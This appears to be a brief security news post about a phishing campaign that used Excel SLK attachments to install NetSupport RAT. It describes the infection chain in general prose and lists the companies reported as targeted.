The researchers at MalwareHunterTeam have discovered a new phishing campaign targeting at least 13 companies, some of them very well known. This new campaign uses SLK (Symbolic Link) file attachments that are used by the Microsoft Excel program to share data between spreadsheets. The emails are sent from accounts that try to impersonate clients or company venders. If an employee opens the SLK file and clicks the “Enable Content” button as instructed by the attackers, commands in the SLK file cause Excel to save a .BAT (batch) file to the %TEMP% folder and execute it, which will use msiexec.exe to download an installer file from a remote server and install malware. Once the installer has been executed, the employee’s workstation will be infected with NetSupport RAT. Gaining access to corporate networks is a possible goldmine for attackers, it would allow them to steal corporate secrets, financial documents, ransomware attacks and a multitude of other damaging attacks. The 13 companies that were originally targeted are:
- A2B Australia Limited
- Asarco LLC
- AusNet Services
- Bega Cheese
- Boc Group Inc
- Glad Products Company
- Hasbro
- Hydratight
- Iridium
- Messer LLC
- MutualBank
- Pact Group
- Sappi North America
On February 17th, MalwareHunterTeam reported yet another company, Beach Energy Limited, targeted by the same attack. It is likely that more major companies across multiple industry segments will continue to be targeted as long as the attack technique is effective.
